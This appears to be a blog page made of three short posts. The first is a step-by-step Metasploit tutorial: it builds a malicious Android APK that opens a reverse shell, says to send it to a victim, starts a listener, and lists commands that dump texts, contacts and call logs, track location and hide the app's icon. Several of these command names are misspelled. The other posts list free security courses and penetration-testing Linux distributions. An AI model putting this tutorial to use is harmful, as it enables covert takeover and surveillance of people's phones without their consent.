METASPLOIT CREATE A PAYLOAD 1. Open a terminal 2. Type the following: msfvenom -p android/meterpreter/reverse_tcp LHOST=your ip LPORT=port no R>apk_name.apk 3. Run this command and wait few seconds 4. Payload created successfully 5. Send the apk file to victim 5. Now, open an another terminal 6. Then type the following: msfconsole (metasploit framework is opened) use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST your ip set LPORT your port np exploit 7. Started reverse tcp handler... Now use the following commands dumb_sms dumb_contacts dumb_calllog geolocate send_sms send_audio_mode hide_app_icon ...etc
As covid-19 spreading rapidly, many institutes and online platforms provides cybersecurity certification courses for free of cost. International CyberSecurity Institute (ICSE) Certified Network Security Specialist This course provides a holistic view of modern network security including operating system hardening, firewalls, intrusion-detection systems, VPNs and encryption. Physical security, system security policies are also included. Fortinet CyberSecurity Training Free Advanced Training for Security Professional These courses cover everything from basic cybersecurity awareness training to advanced training on security driven networking, dynamic cloud security, AI driven security operations and zero trust network access. University of Washington Introduction to CyberSecurity An introduction to cybersecurit...
1. Kali Linux kali linux is the most popular and commonly used ethical hacking operating system. kali linux comes with a large amount of pen testing tools. The popular kali linux tools are: Metasploit nmap wireshark aircrack-ng 2.Parrot Security OS Parrot OS is based on Debian. It comes with large amount of pen testing tools. It uses MATE as its desktop environment. 3.BackBox Backbox is a pen test and security assessment oriented Ubuntu based linux distribution providing a network and informatic systems analysis toolkit.
Comments
Post a Comment